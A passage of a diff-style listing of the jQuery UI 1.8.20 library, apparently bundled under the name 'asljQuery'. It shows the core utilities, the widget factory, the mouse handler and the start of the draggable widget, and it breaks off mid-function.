* Includes: jquery.ui.core.js, jquery.ui.widget.js, jquery.ui.mouse.js, jquery.ui.draggable.js, jquery.ui.droppable.js, jquery.ui.resizable.js, jquery.ui.selectable.js, jquery.ui.sortable.js, jquery.effects.core.js, jquery.effects.blind.js, jquery.effects.bounce.js, jquery.effects.clip.js, jquery.effects.drop.js, jquery.effects.explode.js, jquery.effects.fade.js, jquery.effects.fold.js, jquery.effects.highlight.js, jquery.effects.pulsate.js, jquery.effects.scale.js, jquery.effects.shake.js, jquery.effects.slide.js, jquery.effects.transfer.js, jquery.ui.accordion.js, jquery.ui.autocomplete.js, jquery.ui.button.js, jquery.ui.datepicker.js, jquery.ui.dialog.js, jquery.ui.position.js, jquery.ui.progressbar.js, jquery.ui.slider.js, jquery.ui.tabs.js
|
4 |
+
* Copyright (c) 2012 AUTHORS.txt; Licensed MIT, GPL */
|
5 |
+
(function( $, undefined ) {
|
6 |
+
|
7 |
+
// prevent duplicate loading
|
8 |
+
// this is only a problem because we proxy existing functions
|
9 |
+
// and we don't want to double proxy them
|
10 |
+
$.ui = $.ui || {};
|
11 |
+
if ( $.ui.version ) {
|
12 |
+
return;
|
13 |
+
}
|
14 |
+
|
15 |
+
$.extend( $.ui, {
|
16 |
+
version: "1.8.20",
|
17 |
+
|
18 |
+
keyCode: {
|
19 |
+
ALT: 18,
|
20 |
+
BACKSPACE: 8,
|
21 |
+
CAPS_LOCK: 20,
|
22 |
+
COMMA: 188,
|
23 |
+
COMMAND: 91,
|
24 |
+
COMMAND_LEFT: 91, // COMMAND
|
25 |
+
COMMAND_RIGHT: 93,
|
26 |
+
CONTROL: 17,
|
27 |
+
DELETE: 46,
|
28 |
+
DOWN: 40,
|
29 |
+
END: 35,
|
30 |
+
ENTER: 13,
|
31 |
+
ESCAPE: 27,
|
32 |
+
HOME: 36,
|
33 |
+
INSERT: 45,
|
34 |
+
LEFT: 37,
|
35 |
+
MENU: 93, // COMMAND_RIGHT
|
36 |
+
NUMPAD_ADD: 107,
|
37 |
+
NUMPAD_DECIMAL: 110,
|
38 |
+
NUMPAD_DIVIDE: 111,
|
39 |
+
NUMPAD_ENTER: 108,
|
40 |
+
NUMPAD_MULTIPLY: 106,
|
41 |
+
NUMPAD_SUBTRACT: 109,
|
42 |
+
PAGE_DOWN: 34,
|
43 |
+
PAGE_UP: 33,
|
44 |
+
PERIOD: 190,
|
45 |
+
RIGHT: 39,
|
46 |
+
SHIFT: 16,
|
47 |
+
SPACE: 32,
|
48 |
+
TAB: 9,
|
49 |
+
UP: 38,
|
50 |
+
WINDOWS: 91 // COMMAND
|
51 |
+
}
|
52 |
+
});
|
53 |
+
|
54 |
+
// plugins
|
55 |
+
$.fn.extend({
|
56 |
+
propAttr: $.fn.prop || $.fn.attr,
|
57 |
+
|
58 |
+
_focus: $.fn.focus,
|
59 |
+
focus: function( delay, fn ) {
|
60 |
+
return typeof delay === "number" ?
|
61 |
+
this.each(function() {
|
62 |
+
var elem = this;
|
63 |
+
setTimeout(function() {
|
64 |
+
$( elem ).focus();
|
65 |
+
if ( fn ) {
|
66 |
+
fn.call( elem );
|
67 |
+
}
|
68 |
+
}, delay );
|
69 |
+
}) :
|
70 |
+
this._focus.apply( this, arguments );
|
71 |
+
},
|
72 |
+
|
73 |
+
scrollParent: function() {
|
74 |
+
var scrollParent;
|
75 |
+
if (($.browser.msie && (/(static|relative)/).test(this.css('position'))) || (/absolute/).test(this.css('position'))) {
|
76 |
+
scrollParent = this.parents().filter(function() {
|
77 |
+
return (/(relative|absolute|fixed)/).test($.curCSS(this,'position',1)) && (/(auto|scroll)/).test($.curCSS(this,'overflow',1)+$.curCSS(this,'overflow-y',1)+$.curCSS(this,'overflow-x',1));
|
78 |
+
}).eq(0);
|
79 |
+
} else {
|
80 |
+
scrollParent = this.parents().filter(function() {
|
81 |
+
return (/(auto|scroll)/).test($.curCSS(this,'overflow',1)+$.curCSS(this,'overflow-y',1)+$.curCSS(this,'overflow-x',1));
|
82 |
+
}).eq(0);
|
83 |
+
}
|
84 |
+
|
85 |
+
return (/fixed/).test(this.css('position')) || !scrollParent.length ? $(document) : scrollParent;
|
86 |
+
},
|
87 |
+
|
88 |
+
zIndex: function( zIndex ) {
|
89 |
+
if ( zIndex !== undefined ) {
|
90 |
+
return this.css( "zIndex", zIndex );
|
91 |
+
}
|
92 |
+
|
93 |
+
if ( this.length ) {
|
94 |
+
var elem = $( this[ 0 ] ), position, value;
|
95 |
+
while ( elem.length && elem[ 0 ] !== document ) {
|
96 |
+
// Ignore z-index if position is set to a value where z-index is ignored by the browser
|
97 |
+
// This makes behavior of this function consistent across browsers
|
98 |
+
// WebKit always returns auto if the element is positioned
|
99 |
+
position = elem.css( "position" );
|
100 |
+
if ( position === "absolute" || position === "relative" || position === "fixed" ) {
|
101 |
+
// IE returns 0 when zIndex is not specified
|
102 |
+
// other browsers return a string
|
103 |
+
// we ignore the case of nested elements with an explicit value of 0
|
104 |
+
// <div style="z-index: -10;"><div style="z-index: 0;"></div></div>
|
105 |
+
value = parseInt( elem.css( "zIndex" ), 10 );
|
106 |
+
if ( !isNaN( value ) && value !== 0 ) {
|
107 |
+
return value;
|
108 |
+
}
|
109 |
+
}
|
110 |
+
elem = elem.parent();
|
111 |
+
}
|
112 |
+
}
|
113 |
+
|
114 |
+
return 0;
|
115 |
+
},
|
116 |
+
|
117 |
+
disableSelection: function() {
|
118 |
+
return this.bind( ( $.support.selectstart ? "selectstart" : "mousedown" ) +
|
119 |
+
".ui-disableSelection", function( event ) {
|
120 |
+
event.preventDefault();
|
121 |
+
});
|
122 |
+
},
|
123 |
+
|
124 |
+
enableSelection: function() {
|
125 |
+
return this.unbind( ".ui-disableSelection" );
|
126 |
+
}
|
127 |
+
});
|
128 |
+
|
129 |
+
$.each( [ "Width", "Height" ], function( i, name ) {
|
130 |
+
var side = name === "Width" ? [ "Left", "Right" ] : [ "Top", "Bottom" ],
|
131 |
+
type = name.toLowerCase(),
|
132 |
+
orig = {
|
133 |
+
innerWidth: $.fn.innerWidth,
|
134 |
+
innerHeight: $.fn.innerHeight,
|
135 |
+
outerWidth: $.fn.outerWidth,
|
136 |
+
outerHeight: $.fn.outerHeight
|
137 |
+
};
|
138 |
+
|
139 |
+
function reduce( elem, size, border, margin ) {
|
140 |
+
$.each( side, function() {
|
141 |
+
size -= parseFloat( $.curCSS( elem, "padding" + this, true) ) || 0;
|
142 |
+
if ( border ) {
|
143 |
+
size -= parseFloat( $.curCSS( elem, "border" + this + "Width", true) ) || 0;
|
144 |
+
}
|
145 |
+
if ( margin ) {
|
146 |
+
size -= parseFloat( $.curCSS( elem, "margin" + this, true) ) || 0;
|
147 |
+
}
|
148 |
+
});
|
149 |
+
return size;
|
150 |
+
}
|
151 |
+
|
152 |
+
$.fn[ "inner" + name ] = function( size ) {
|
153 |
+
if ( size === undefined ) {
|
154 |
+
return orig[ "inner" + name ].call( this );
|
155 |
+
}
|
156 |
+
|
157 |
+
return this.each(function() {
|
158 |
+
$( this ).css( type, reduce( this, size ) + "px" );
|
159 |
+
});
|
160 |
+
};
|
161 |
+
|
162 |
+
$.fn[ "outer" + name] = function( size, margin ) {
|
163 |
+
if ( typeof size !== "number" ) {
|
164 |
+
return orig[ "outer" + name ].call( this, size );
|
165 |
+
}
|
166 |
+
|
167 |
+
return this.each(function() {
|
168 |
+
$( this).css( type, reduce( this, size, true, margin ) + "px" );
|
169 |
+
});
|
170 |
+
};
|
171 |
+
});
|
172 |
+
|
173 |
+
// selectors
|
174 |
+
function focusable( element, isTabIndexNotNaN ) {
|
175 |
+
var nodeName = element.nodeName.toLowerCase();
|
176 |
+
if ( "area" === nodeName ) {
|
177 |
+
var map = element.parentNode,
|
178 |
+
mapName = map.name,
|
179 |
+
img;
|
180 |
+
if ( !element.href || !mapName || map.nodeName.toLowerCase() !== "map" ) {
|
181 |
+
return false;
|
182 |
+
}
|
183 |
+
img = $( "img[usemap=#" + mapName + "]" )[0];
|
184 |
+
return !!img && visible( img );
|
185 |
+
}
|
186 |
+
return ( /input|select|textarea|button|object/.test( nodeName )
|
187 |
+
? !element.disabled
|
188 |
+
: "a" == nodeName
|
189 |
+
? element.href || isTabIndexNotNaN
|
190 |
+
: isTabIndexNotNaN)
|
191 |
+
// the element and all of its ancestors must be visible
|
192 |
+
&& visible( element );
|
193 |
+
}
|
194 |
+
|
195 |
+
function visible( element ) {
|
196 |
+
return !$( element ).parents().andSelf().filter(function() {
|
197 |
+
return $.curCSS( this, "visibility" ) === "hidden" ||
|
198 |
+
$.expr.filters.hidden( this );
|
199 |
+
}).length;
|
200 |
+
}
|
201 |
+
|
202 |
+
$.extend( $.expr[ ":" ], {
|
203 |
+
data: function( elem, i, match ) {
|
204 |
+
return !!$.data( elem, match[ 3 ] );
|
205 |
+
},
|
206 |
+
|
207 |
+
focusable: function( element ) {
|
208 |
+
return focusable( element, !isNaN( $.attr( element, "tabindex" ) ) );
|
209 |
+
},
|
210 |
+
|
211 |
+
tabbable: function( element ) {
|
212 |
+
var tabIndex = $.attr( element, "tabindex" ),
|
213 |
+
isTabIndexNaN = isNaN( tabIndex );
|
214 |
+
return ( isTabIndexNaN || tabIndex >= 0 ) && focusable( element, !isTabIndexNaN );
|
215 |
+
}
|
216 |
+
});
|
217 |
+
|
218 |
+
// support
|
219 |
+
$(function() {
|
220 |
+
var body = document.body,
|
221 |
+
div = body.appendChild( div = document.createElement( "div" ) );
|
222 |
+
|
223 |
+
// access offsetHeight before setting the style to prevent a layout bug
|
224 |
+
// in IE 9 which causes the elemnt to continue to take up space even
|
225 |
+
// after it is removed from the DOM (#8026)
|
226 |
+
div.offsetHeight;
|
227 |
+
|
228 |
+
$.extend( div.style, {
|
229 |
+
minHeight: "100px",
|
230 |
+
height: "auto",
|
231 |
+
padding: 0,
|
232 |
+
borderWidth: 0
|
233 |
+
});
|
234 |
+
|
235 |
+
$.support.minHeight = div.offsetHeight === 100;
|
236 |
+
$.support.selectstart = "onselectstart" in div;
|
237 |
+
|
238 |
+
// set display to none to avoid a layout bug in IE
|
239 |
+
// http://dev.jquery.com/ticket/4014
|
240 |
+
body.removeChild( div ).style.display = "none";
|
241 |
+
});
|
242 |
+
|
243 |
+
|
244 |
+
|
245 |
+
|
246 |
+
|
247 |
+
// deprecated
|
248 |
+
$.extend( $.ui, {
|
249 |
+
// $.ui.plugin is deprecated. Use the proxy pattern instead.
|
250 |
+
plugin: {
|
251 |
+
add: function( module, option, set ) {
|
252 |
+
var proto = $.ui[ module ].prototype;
|
253 |
+
for ( var i in set ) {
|
254 |
+
proto.plugins[ i ] = proto.plugins[ i ] || [];
|
255 |
+
proto.plugins[ i ].push( [ option, set[ i ] ] );
|
256 |
+
}
|
257 |
+
},
|
258 |
+
call: function( instance, name, args ) {
|
259 |
+
var set = instance.plugins[ name ];
|
260 |
+
if ( !set || !instance.element[ 0 ].parentNode ) {
|
261 |
+
return;
|
262 |
+
}
|
263 |
+
|
264 |
+
for ( var i = 0; i < set.length; i++ ) {
|
265 |
+
if ( instance.options[ set[ i ][ 0 ] ] ) {
|
266 |
+
set[ i ][ 1 ].apply( instance.element, args );
|
267 |
+
}
|
268 |
+
}
|
269 |
+
}
|
270 |
+
},
|
271 |
+
|
272 |
+
// will be deprecated when we switch to jQuery 1.4 - use jQuery.contains()
|
273 |
+
contains: function( a, b ) {
|
274 |
+
return document.compareDocumentPosition ?
|
275 |
+
a.compareDocumentPosition( b ) & 16 :
|
276 |
+
a !== b && a.contains( b );
|
277 |
+
},
|
278 |
+
|
279 |
+
// only used by resizable
|
280 |
+
hasScroll: function( el, a ) {
|
281 |
+
|
282 |
+
//If overflow is hidden, the element might have extra content, but the user wants to hide it
|
283 |
+
if ( $( el ).css( "overflow" ) === "hidden") {
|
284 |
+
return false;
|
285 |
+
}
|
286 |
+
|
287 |
+
var scroll = ( a && a === "left" ) ? "scrollLeft" : "scrollTop",
|
288 |
+
has = false;
|
289 |
+
|
290 |
+
if ( el[ scroll ] > 0 ) {
|
291 |
+
return true;
|
292 |
+
}
|
293 |
+
|
294 |
+
// TODO: determine which cases actually cause this to happen
|
295 |
+
// if the element doesn't have the scroll set, see if it's possible to
|
296 |
+
// set the scroll
|
297 |
+
el[ scroll ] = 1;
|
298 |
+
has = ( el[ scroll ] > 0 );
|
299 |
+
el[ scroll ] = 0;
|
300 |
+
return has;
|
301 |
+
},
|
302 |
+
|
303 |
+
// these are odd functions, fix the API or move into individual plugins
|
304 |
+
isOverAxis: function( x, reference, size ) {
|
305 |
+
//Determines when x coordinate is over "b" element axis
|
306 |
+
return ( x > reference ) && ( x < ( reference + size ) );
|
307 |
+
},
|
308 |
+
isOver: function( y, x, top, left, height, width ) {
|
309 |
+
//Determines when x, y coordinates is over "b" element
|
310 |
+
return $.ui.isOverAxis( y, top, height ) && $.ui.isOverAxis( x, left, width );
|
311 |
+
}
|
312 |
+
});
|
313 |
+
|
314 |
+
})(asljQuery);
|
315 |
+
|
316 |
+
(function( $, undefined ) {
|
317 |
+
|
318 |
+
// jQuery 1.4+
|
319 |
+
if ( $.cleanData ) {
|
320 |
+
var _cleanData = $.cleanData;
|
321 |
+
$.cleanData = function( elems ) {
|
322 |
+
for ( var i = 0, elem; (elem = elems[i]) != null; i++ ) {
|
323 |
+
try {
|
324 |
+
$( elem ).triggerHandler( "remove" );
|
325 |
+
// http://bugs.jquery.com/ticket/8235
|
326 |
+
} catch( e ) {}
|
327 |
+
}
|
328 |
+
_cleanData( elems );
|
329 |
+
};
|
330 |
+
} else {
|
331 |
+
var _remove = $.fn.remove;
|
332 |
+
$.fn.remove = function( selector, keepData ) {
|
333 |
+
return this.each(function() {
|
334 |
+
if ( !keepData ) {
|
335 |
+
if ( !selector || $.filter( selector, [ this ] ).length ) {
|
336 |
+
$( "*", this ).add( [ this ] ).each(function() {
|
337 |
+
try {
|
338 |
+
$( this ).triggerHandler( "remove" );
|
339 |
+
// http://bugs.jquery.com/ticket/8235
|
340 |
+
} catch( e ) {}
|
341 |
+
});
|
342 |
+
}
|
343 |
+
}
|
344 |
+
return _remove.call( $(this), selector, keepData );
|
345 |
+
});
|
346 |
+
};
|
347 |
+
}
|
348 |
+
|
349 |
+
$.widget = function( name, base, prototype ) {
|
350 |
+
var namespace = name.split( "." )[ 0 ],
|
351 |
+
fullName;
|
352 |
+
name = name.split( "." )[ 1 ];
|
353 |
+
fullName = namespace + "-" + name;
|
354 |
+
|
355 |
+
if ( !prototype ) {
|
356 |
+
prototype = base;
|
357 |
+
base = $.Widget;
|
358 |
+
}
|
359 |
+
|
360 |
+
// create selector for plugin
|
361 |
+
$.expr[ ":" ][ fullName ] = function( elem ) {
|
362 |
+
return !!$.data( elem, name );
|
363 |
+
};
|
364 |
+
|
365 |
+
$[ namespace ] = $[ namespace ] || {};
|
366 |
+
$[ namespace ][ name ] = function( options, element ) {
|
367 |
+
// allow instantiation without initializing for simple inheritance
|
368 |
+
if ( arguments.length ) {
|
369 |
+
this._createWidget( options, element );
|
370 |
+
}
|
371 |
+
};
|
372 |
+
|
373 |
+
var basePrototype = new base();
|
374 |
+
// we need to make the options hash a property directly on the new instance
|
375 |
+
// otherwise we'll modify the options hash on the prototype that we're
|
376 |
+
// inheriting from
|
377 |
+
// $.each( basePrototype, function( key, val ) {
|
378 |
+
// if ( $.isPlainObject(val) ) {
|
379 |
+
// basePrototype[ key ] = $.extend( {}, val );
|
380 |
+
// }
|
381 |
+
// });
|
382 |
+
basePrototype.options = $.extend( true, {}, basePrototype.options );
|
383 |
+
$[ namespace ][ name ].prototype = $.extend( true, basePrototype, {
|
384 |
+
namespace: namespace,
|
385 |
+
widgetName: name,
|
386 |
+
widgetEventPrefix: $[ namespace ][ name ].prototype.widgetEventPrefix || name,
|
387 |
+
widgetBaseClass: fullName
|
388 |
+
}, prototype );
|
389 |
+
|
390 |
+
$.widget.bridge( name, $[ namespace ][ name ] );
|
391 |
+
};
|
392 |
+
|
393 |
+
$.widget.bridge = function( name, object ) {
|
394 |
+
$.fn[ name ] = function( options ) {
|
395 |
+
var isMethodCall = typeof options === "string",
|
396 |
+
args = Array.prototype.slice.call( arguments, 1 ),
|
397 |
+
returnValue = this;
|
398 |
+
|
399 |
+
// allow multiple hashes to be passed on init
|
400 |
+
options = !isMethodCall && args.length ?
|
401 |
+
$.extend.apply( null, [ true, options ].concat(args) ) :
|
402 |
+
options;
|
403 |
+
|
404 |
+
// prevent calls to internal methods
|
405 |
+
if ( isMethodCall && options.charAt( 0 ) === "_" ) {
|
406 |
+
return returnValue;
|
407 |
+
}
|
408 |
+
|
409 |
+
if ( isMethodCall ) {
|
410 |
+
this.each(function() {
|
411 |
+
var instance = $.data( this, name ),
|
412 |
+
methodValue = instance && $.isFunction( instance[options] ) ?
|
413 |
+
instance[ options ].apply( instance, args ) :
|
414 |
+
instance;
|
415 |
+
// TODO: add this back in 1.9 and use $.error() (see #5972)
|
416 |
+
// if ( !instance ) {
|
417 |
+
// throw "cannot call methods on " + name + " prior to initialization; " +
|
418 |
+
// "attempted to call method '" + options + "'";
|
419 |
+
// }
|
420 |
+
// if ( !$.isFunction( instance[options] ) ) {
|
421 |
+
// throw "no such method '" + options + "' for " + name + " widget instance";
|
422 |
+
// }
|
423 |
+
// var methodValue = instance[ options ].apply( instance, args );
|
424 |
+
if ( methodValue !== instance && methodValue !== undefined ) {
|
425 |
+
returnValue = methodValue;
|
426 |
+
return false;
|
427 |
+
}
|
428 |
+
});
|
429 |
+
} else {
|
430 |
+
this.each(function() {
|
431 |
+
var instance = $.data( this, name );
|
432 |
+
if ( instance ) {
|
433 |
+
instance.option( options || {} )._init();
|
434 |
+
} else {
|
435 |
+
$.data( this, name, new object( options, this ) );
|
436 |
+
}
|
437 |
+
});
|
438 |
+
}
|
439 |
+
|
440 |
+
return returnValue;
|
441 |
+
};
|
442 |
+
};
|
443 |
+
|
444 |
+
$.Widget = function( options, element ) {
|
445 |
+
// allow instantiation without initializing for simple inheritance
|
446 |
+
if ( arguments.length ) {
|
447 |
+
this._createWidget( options, element );
|
448 |
+
}
|
449 |
+
};
|
450 |
+
|
451 |
+
$.Widget.prototype = {
|
452 |
+
widgetName: "widget",
|
453 |
+
widgetEventPrefix: "",
|
454 |
+
options: {
|
455 |
+
disabled: false
|
456 |
+
},
|
457 |
+
_createWidget: function( options, element ) {
|
458 |
+
// $.widget.bridge stores the plugin instance, but we do it anyway
|
459 |
+
// so that it's stored even before the _create function runs
|
460 |
+
$.data( element, this.widgetName, this );
|
461 |
+
this.element = $( element );
|
462 |
+
this.options = $.extend( true, {},
|
463 |
+
this.options,
|
464 |
+
this._getCreateOptions(),
|
465 |
+
options );
|
466 |
+
|
467 |
+
var self = this;
|
468 |
+
this.element.bind( "remove." + this.widgetName, function() {
|
469 |
+
self.destroy();
|
470 |
+
});
|
471 |
+
|
472 |
+
this._create();
|
473 |
+
this._trigger( "create" );
|
474 |
+
this._init();
|
475 |
+
},
|
476 |
+
_getCreateOptions: function() {
|
477 |
+
return $.metadata && $.metadata.get( this.element[0] )[ this.widgetName ];
|
478 |
+
},
|
479 |
+
_create: function() {},
|
480 |
+
_init: function() {},
|
481 |
+
|
482 |
+
destroy: function() {
|
483 |
+
this.element
|
484 |
+
.unbind( "." + this.widgetName )
|
485 |
+
.removeData( this.widgetName );
|
486 |
+
this.widget()
|
487 |
+
.unbind( "." + this.widgetName )
|
488 |
+
.removeAttr( "aria-disabled" )
|
489 |
+
.removeClass(
|
490 |
+
this.widgetBaseClass + "-disabled " +
|
491 |
+
"ui-state-disabled" );
|
492 |
+
},
|
493 |
+
|
494 |
+
widget: function() {
|
495 |
+
return this.element;
|
496 |
+
},
|
497 |
+
|
498 |
+
option: function( key, value ) {
|
499 |
+
var options = key;
|
500 |
+
|
501 |
+
if ( arguments.length === 0 ) {
|
502 |
+
// don't return a reference to the internal hash
|
503 |
+
return $.extend( {}, this.options );
|
504 |
+
}
|
505 |
+
|
506 |
+
if (typeof key === "string" ) {
|
507 |
+
if ( value === undefined ) {
|
508 |
+
return this.options[ key ];
|
509 |
+
}
|
510 |
+
options = {};
|
511 |
+
options[ key ] = value;
|
512 |
+
}
|
513 |
+
|
514 |
+
this._setOptions( options );
|
515 |
+
|
516 |
+
return this;
|
517 |
+
},
|
518 |
+
_setOptions: function( options ) {
|
519 |
+
var self = this;
|
520 |
+
$.each( options, function( key, value ) {
|
521 |
+
self._setOption( key, value );
|
522 |
+
});
|
523 |
+
|
524 |
+
return this;
|
525 |
+
},
|
526 |
+
_setOption: function( key, value ) {
|
527 |
+
this.options[ key ] = value;
|
528 |
+
|
529 |
+
if ( key === "disabled" ) {
|
530 |
+
this.widget()
|
531 |
+
[ value ? "addClass" : "removeClass"](
|
532 |
+
this.widgetBaseClass + "-disabled" + " " +
|
533 |
+
"ui-state-disabled" )
|
534 |
+
.attr( "aria-disabled", value );
|
535 |
+
}
|
536 |
+
|
537 |
+
return this;
|
538 |
+
},
|
539 |
+
|
540 |
+
enable: function() {
|
541 |
+
return this._setOption( "disabled", false );
|
542 |
+
},
|
543 |
+
disable: function() {
|
544 |
+
return this._setOption( "disabled", true );
|
545 |
+
},
|
546 |
+
|
547 |
+
_trigger: function( type, event, data ) {
|
548 |
+
var prop, orig,
|
549 |
+
callback = this.options[ type ];
|
550 |
+
|
551 |
+
data = data || {};
|
552 |
+
event = $.Event( event );
|
553 |
+
event.type = ( type === this.widgetEventPrefix ?
|
554 |
+
type :
|
555 |
+
this.widgetEventPrefix + type ).toLowerCase();
|
556 |
+
// the original event may come from any element
|
557 |
+
// so we need to reset the target on the new event
|
558 |
+
event.target = this.element[ 0 ];
|
559 |
+
|
560 |
+
// copy original event properties over to the new event
|
561 |
+
orig = event.originalEvent;
|
562 |
+
if ( orig ) {
|
563 |
+
for ( prop in orig ) {
|
564 |
+
if ( !( prop in event ) ) {
|
565 |
+
event[ prop ] = orig[ prop ];
|
566 |
+
}
|
567 |
+
}
|
568 |
+
}
|
569 |
+
|
570 |
+
this.element.trigger( event, data );
|
571 |
+
|
572 |
+
return !( $.isFunction(callback) &&
|
573 |
+
callback.call( this.element[0], event, data ) === false ||
|
574 |
+
event.isDefaultPrevented() );
|
575 |
+
}
|
576 |
+
};
|
577 |
+
|
578 |
+
})(asljQuery);
|
579 |
+
|
580 |
+
(function( $, undefined ) {
|
581 |
+
|
582 |
+
var mouseHandled = false;
|
583 |
+
$( document ).mouseup( function( e ) {
|
584 |
+
mouseHandled = false;
|
585 |
+
});
|
586 |
+
|
587 |
+
$.widget("ui.mouse", {
|
588 |
+
options: {
|
589 |
+
cancel: ':input,option',
|
590 |
+
distance: 1,
|
591 |
+
delay: 0
|
592 |
+
},
|
593 |
+
_mouseInit: function() {
|
594 |
+
var self = this;
|
595 |
+
|
596 |
+
this.element
|
597 |
+
.bind('mousedown.'+this.widgetName, function(event) {
|
598 |
+
return self._mouseDown(event);
|
599 |
+
})
|
600 |
+
.bind('click.'+this.widgetName, function(event) {
|
601 |
+
if (true === $.data(event.target, self.widgetName + '.preventClickEvent')) {
|
602 |
+
$.removeData(event.target, self.widgetName + '.preventClickEvent');
|
603 |
+
event.stopImmediatePropagation();
|
604 |
+
return false;
|
605 |
+
}
|
606 |
+
});
|
607 |
+
|
608 |
+
this.started = false;
|
609 |
+
},
|
610 |
+
|
611 |
+
// TODO: make sure destroying one instance of mouse doesn't mess with
|
612 |
+
// other instances of mouse
|
613 |
+
_mouseDestroy: function() {
|
614 |
+
this.element.unbind('.'+this.widgetName);
|
615 |
+
$(document)
|
616 |
+
.unbind('mousemove.'+this.widgetName, this._mouseMoveDelegate)
|
617 |
+
.unbind('mouseup.'+this.widgetName, this._mouseUpDelegate);
|
618 |
+
},
|
619 |
+
|
620 |
+
_mouseDown: function(event) {
|
621 |
+
// don't let more than one widget handle mouseStart
|
622 |
+
if( mouseHandled ) { return };
|
623 |
+
|
624 |
+
// we may have missed mouseup (out of window)
|
625 |
+
(this._mouseStarted && this._mouseUp(event));
|
626 |
+
|
627 |
+
this._mouseDownEvent = event;
|
628 |
+
|
629 |
+
var self = this,
|
630 |
+
btnIsLeft = (event.which == 1),
|
631 |
+
// event.target.nodeName works around a bug in IE 8 with
|
632 |
+
// disabled inputs (#7620)
|
633 |
+
elIsCancel = (typeof this.options.cancel == "string" && event.target.nodeName ? $(event.target).closest(this.options.cancel).length : false);
|
634 |
+
if (!btnIsLeft || elIsCancel || !this._mouseCapture(event)) {
|
635 |
+
return true;
|
636 |
+
}
|
637 |
+
|
638 |
+
this.mouseDelayMet = !this.options.delay;
|
639 |
+
if (!this.mouseDelayMet) {
|
640 |
+
this._mouseDelayTimer = setTimeout(function() {
|
641 |
+
self.mouseDelayMet = true;
|
642 |
+
}, this.options.delay);
|
643 |
+
}
|
644 |
+
|
645 |
+
if (this._mouseDistanceMet(event) && this._mouseDelayMet(event)) {
|
646 |
+
this._mouseStarted = (this._mouseStart(event) !== false);
|
647 |
+
if (!this._mouseStarted) {
|
648 |
+
event.preventDefault();
|
649 |
+
return true;
|
650 |
+
}
|
651 |
+
}
|
652 |
+
|
653 |
+
// Click event may never have fired (Gecko & Opera)
|
654 |
+
if (true === $.data(event.target, this.widgetName + '.preventClickEvent')) {
|
655 |
+
$.removeData(event.target, this.widgetName + '.preventClickEvent');
|
656 |
+
}
|
657 |
+
|
658 |
+
// these delegates are required to keep context
|
659 |
+
this._mouseMoveDelegate = function(event) {
|
660 |
+
return self._mouseMove(event);
|
661 |
+
};
|
662 |
+
this._mouseUpDelegate = function(event) {
|
663 |
+
return self._mouseUp(event);
|
664 |
+
};
|
665 |
+
$(document)
|
666 |
+
.bind('mousemove.'+this.widgetName, this._mouseMoveDelegate)
|
667 |
+
.bind('mouseup.'+this.widgetName, this._mouseUpDelegate);
|
668 |
+
|
669 |
+
event.preventDefault();
|
670 |
+
|
671 |
+
mouseHandled = true;
|
672 |
+
return true;
|
673 |
+
},
|
674 |
+
|
675 |
+
_mouseMove: function(event) {
|
676 |
+
// IE mouseup check - mouseup happened when mouse was out of window
|
677 |
+
if ($.browser.msie && !(document.documentMode >= 9) && !event.button) {
|
678 |
+
return this._mouseUp(event);
|
679 |
+
}
|
680 |
+
|
681 |
+
if (this._mouseStarted) {
|
682 |
+
this._mouseDrag(event);
|
683 |
+
return event.preventDefault();
|
684 |
+
}
|
685 |
+
|
686 |
+
if (this._mouseDistanceMet(event) && this._mouseDelayMet(event)) {
|
687 |
+
this._mouseStarted =
|
688 |
+
(this._mouseStart(this._mouseDownEvent, event) !== false);
|
689 |
+
(this._mouseStarted ? this._mouseDrag(event) : this._mouseUp(event));
|
690 |
+
}
|
691 |
+
|
692 |
+
return !this._mouseStarted;
|
693 |
+
},
|
694 |
+
|
695 |
+
_mouseUp: function(event) {
|
696 |
+
$(document)
|
697 |
+
.unbind('mousemove.'+this.widgetName, this._mouseMoveDelegate)
|
698 |
+
.unbind('mouseup.'+this.widgetName, this._mouseUpDelegate);
|
699 |
+
|
700 |
+
if (this._mouseStarted) {
|
701 |
+
this._mouseStarted = false;
|
702 |
+
|
703 |
+
if (event.target == this._mouseDownEvent.target) {
|
704 |
+
$.data(event.target, this.widgetName + '.preventClickEvent', true);
|
705 |
+
}
|
706 |
+
|
707 |
+
this._mouseStop(event);
|
708 |
+
}
|
709 |
+
|
710 |
+
return false;
|
711 |
+
},
|
712 |
+
|
713 |
+
_mouseDistanceMet: function(event) {
|
714 |
+
return (Math.max(
|
715 |
+
Math.abs(this._mouseDownEvent.pageX - event.pageX),
|
716 |
+
Math.abs(this._mouseDownEvent.pageY - event.pageY)
|
717 |
+
) >= this.options.distance
|
718 |
+
);
|
719 |
+
},
|
720 |
+
|
721 |
+
_mouseDelayMet: function(event) {
|
722 |
+
return this.mouseDelayMet;
|
723 |
+
},
|
724 |
+
|
725 |
+
// These are placeholder methods, to be overriden by extending plugin
|
726 |
+
_mouseStart: function(event) {},
|
727 |
+
_mouseDrag: function(event) {},
|
728 |
+
_mouseStop: function(event) {},
|
729 |
+
_mouseCapture: function(event) { return true; }
|
730 |
+
});
|
731 |
+
|
732 |
+
})(asljQuery);
|
733 |
+
|
734 |
+
(function( $, undefined ) {
|
735 |
+
|
736 |
+
$.widget("ui.draggable", $.ui.mouse, {
|
737 |
+
widgetEventPrefix: "drag",
|
738 |
+
options: {
|
739 |
+
addClasses: true,
|
740 |
+
appendTo: "parent",
|
741 |
+
axis: false,
|
742 |
+
connectToSortable: false,
|
743 |
+
containment: false,
|
744 |
+
cursor: "auto",
|
745 |
+
cursorAt: false,
|
746 |
+
grid: false,
|
747 |
+
handle: false,
|
748 |
+
helper: "original",
|
749 |
+
iframeFix: false,
|
750 |
+
opacity: false,
|
751 |
+
refreshPositions: false,
|
752 |
+
revert: false,
|
753 |
+
revertDuration: 500,
|
754 |
+
scope: "default",
|
755 |
+
scroll: true,
|
756 |
+
scrollSensitivity: 20,
|
757 |
+
scrollSpeed: 20,
|
758 |
+
snap: false,
|
759 |
+
snapMode: "both",
|
760 |
+
snapTolerance: 20,
|
761 |
+
stack: false,
|
762 |
+
zIndex: false
|
763 |
+
},
|
764 |
+
_create: function() {
|
765 |
+
|
766 |
+
if (this.options.helper == 'original' && !(/^(?:r|a|f)/).test(this.element.css("position")))
|
767 |
+
this.element[0].style.position = 'relative';
|
768 |
+
|
769 |
+
(this.options.addClasses && this.element.addClass("ui-draggable"));
|
770 |
+
(this.options.disabled && this.element.addClass("ui-draggable-disabled"));
|
771 |
+
|
772 |
+
this._mouseInit();
|
773 |
+
|
774 |
+
},
|
775 |
+
|
776 |
+
destroy: function() {
|
777 |
+
if(!this.element.data('draggable')) return;
|
778 |
+
this.element
|
779 |
+
.removeData("draggable")
|
780 |
+
